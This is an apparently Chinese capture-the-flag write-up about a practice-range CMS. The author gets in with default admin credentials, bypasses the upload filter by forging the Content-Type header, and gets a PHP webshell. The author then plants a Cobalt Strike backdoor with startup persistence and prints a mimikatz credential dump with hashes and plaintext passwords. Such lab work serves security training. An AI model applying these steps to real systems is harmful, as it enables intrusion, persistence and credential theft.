绕过防护getshell

绕过防护getshell

0x01. 明确目标

https://hack.zkaq.cn/battle/target?id=641b720edbd0e2b6

估计是一个通过注入点 , 然后一步一步拿到shell的 , 然后拿到flag

0x02. 主要思路

http://59.63.200.79:8003/bees/

首先这个站点是一个cms站 , 既然是getshell , 那肯定是从后台下手比较好 , 直接在url后接admin试试

http://59.63.200.79:8003/bees/admin/login.php

果不其然是默认后台没有改 , 既然都到这了 , 那就admin/admin试试呗

我靠 , 这靶场是真的是0基础啊 , 话不多说 , 找上传点把 , 刚点进去就在网站设置的基本设置下找到了一个上传图

片的上传入口

二话不说 , 先点击去试试

既然是白名单过滤 , 进一步尝试是不是扩展名白名单过滤 , 还是检测的文件头 , 或者MIME类型呢?

0x03. 抓包调试

截取上传文件的请求包

直接上传 , 果然是被拦截的

尝试修改Content-Type头

Content-Type: image/png

上传成功 , 查看图片路径 , 菜刀连接

/upload/img/202101301633172903.php

0x04. getshell

http://59.63.200.79:8003/bees/upload/img/202101301633172903.php

flag_{axdeDaf}

提交flag , 完美结束 , 通过一个白名单绕过 , 就轻轻松松getshell了 , 还有题目提示的注入点呢 ?

楼一眼权限

果然用phpstudy搭建的站点默认都是system权限

一台搭建在虚拟机上的2003 , 试试扔一个后门试试? 没错cs搞起来

而且还把后门放到了一个系统级别的隐藏文件夹中, 同时把他copy到了启动项

通过cs简单看看密码吧

beacon> logonpasswords
[*] Tasked beacon to run mimikatz's sekurlsa::logonpasswords command
[+] host called home, sent: 633426 bytes
[+] received output:

Authentication Id : 0 ; 27520470 (00000000:01a3edd6)
Session           : RemoteInteractive from 4
User Name         : Administrator
Domain            : GONGKAIK-D45FB6
Logon Server      : GONGKAIK-D45FB6
Logon Time        : 2020-12-12 0:30:09
SID               : S-1-5-21-2775063910-2920827999-2173817585-500
	msv :	
	 [00000002] Primary
	 * Username : Administrator
	 * Domain   : GONGKAIK-D45FB6
	 * LM       : 4d582fa9df7504345e8e7baade1462e6
	 * NTLM     : 43322078afa889e76ead4e24593fe0f6
	 * SHA1     : 0da6cbfad62801060ae66a9d6c1d75599f354f44
	wdigest :	
	 * Username : Administrator
	 * Domain   : GONGKAIK-D45FB6
	 * Password : wow!yougotit!
	kerberos :	
	 * Username : Administrator
	 * Domain   : GONGKAIK-D45FB6
	 * Password : wow!yougotit!
	ssp :	
	credman :	

Authentication Id : 0 ; 251204 (00000000:0003d544)
Session           : NetworkCleartext from 0
User Name         : IUSR_GONGKAIK-D45FB6
Domain            : GONGKAIK-D45FB6
Logon Server      : GONGKAIK-D45FB6
Logon Time        : 2020-10-30 21:39:09
SID               : S-1-5-21-2775063910-2920827999-2173817585-1003
	msv :	
	 [00000002] Primary
	 * Username : IUSR_GONGKAIK-D45FB6
	 * Domain   : GONGKAIK-D45FB6
	 * LM       : 987d337aa99a3f68a6c7930727053580
	 * NTLM     : 1d77c613a0ce4675e78682520826a6db
	 * SHA1     : 32d407c860a6d70f5f8c84721bd2cef76a0d6143
	wdigest :	
	 * Username : IUSR_GONGKAIK-D45FB6
	 * Domain   : GONGKAIK-D45FB6
	 * Password : c0\T1N/7.u)ENp
	kerberos :	
	 * Username : IUSR_GONGKAIK-D45FB6
	 * Domain   : GONGKAIK-D45FB6
	 * Password : c0\T1N/7.u)ENp
	ssp :	
	credman :	

Authentication Id : 0 ; 996 (00000000:000003e4)
Session           : Service from 0
User Name         : NETWORK SERVICE
Domain            : NT AUTHORITY
Logon Server      : (null)
Logon Time        : 2020-8-13 22:07:19
SID               : S-1-5-20
	msv :	
	 [00000002] Primary
	 * Username : GONGKAIK-D45FB6$
	 * Domain   : WORKGROUP
	 * LM       : aad3b435b51404eeaad3b435b51404ee
	 * NTLM     : 31d6cfe0d16ae931b73c59d7e0c089c0
	 * SHA1     : da39a3ee5e6b4b0d3255bfef95601890afd80709
	wdigest :	
	 * Username : GONGKAIK-D45FB6$
	 * Domain   : WORKGROUP
	 * Password : (null)
	kerberos :	
	 * Username : gongkaik-d45fb6$
	 * Domain   : WORKGROUP
	 * Password : (null)
	ssp :	
	credman :	

Authentication Id : 0 ; 644823 (00000000:0009d6d7)
Session           : RemoteInteractive from 1
User Name         : Administrator
Domain            : GONGKAIK-D45FB6
Logon Server      : GONGKAIK-D45FB6
Logon Time        : 2020-10-30 21:47:50
SID               : S-1-5-21-2775063910-2920827999-2173817585-500
	msv :	
	 [00000002] Primary
	 * Username : Administrator
	 * Domain   : GONGKAIK-D45FB6
	 * LM       : 4d582fa9df7504345e8e7baade1462e6
	 * NTLM     : 43322078afa889e76ead4e24593fe0f6
	 * SHA1     : 0da6cbfad62801060ae66a9d6c1d75599f354f44
	wdigest :	
	 * Username : Administrator
	 * Domain   : GONGKAIK-D45FB6
	 * Password : wow!yougotit!
	kerberos :	
	 * Username : Administrator
	 * Domain   : GONGKAIK-D45FB6
	 * Password : wow!yougotit!
	ssp :	
	credman :	

Authentication Id : 0 ; 997 (00000000:000003e5)
Session           : Service from 0
User Name         : LOCAL SERVICE
Domain            : NT AUTHORITY
Logon Server      : (null)
Logon Time        : 2020-8-13 22:07:20
SID               : S-1-5-19
	msv :	
	wdigest :	
	kerberos :	
	 * Username : (null)
	 * Domain   : (null)
	 * Password : (null)
	ssp :	
	credman :	

Authentication Id : 0 ; 47925 (00000000:0000bb35)
Session           : UndefinedLogonType from 0
User Name         : (null)
Domain            : (null)
Logon Server      : (null)
Logon Time        : 2020-8-13 22:07:18
SID               : 
	msv :	
	wdigest :	
	kerberos :	
	ssp :	
	credman :	

Authentication Id : 0 ; 999 (00000000:000003e7)
Session           : UndefinedLogonType from 0
User Name         : GONGKAIK-D45FB6$
Domain            : WORKGROUP
Logon Server      : (null)
Logon Time        : 2020-8-13 22:07:18
SID               : S-1-5-18
	msv :	
	wdigest :	
	kerberos :	
	 * Username : gongkaik-d45fb6$
	 * Domain   : WORKGROUP
	 * Password : (null)
	ssp :	
	credman :	

	 * Password : wow!yougotit!      # 感觉这个才是比flag更彩的彩蛋	                       哇     你得到了 它

0x05. 关于注入点

请看那一关的视频介绍 , 多读书 , 多看报 , 少吃零食 , 早睡觉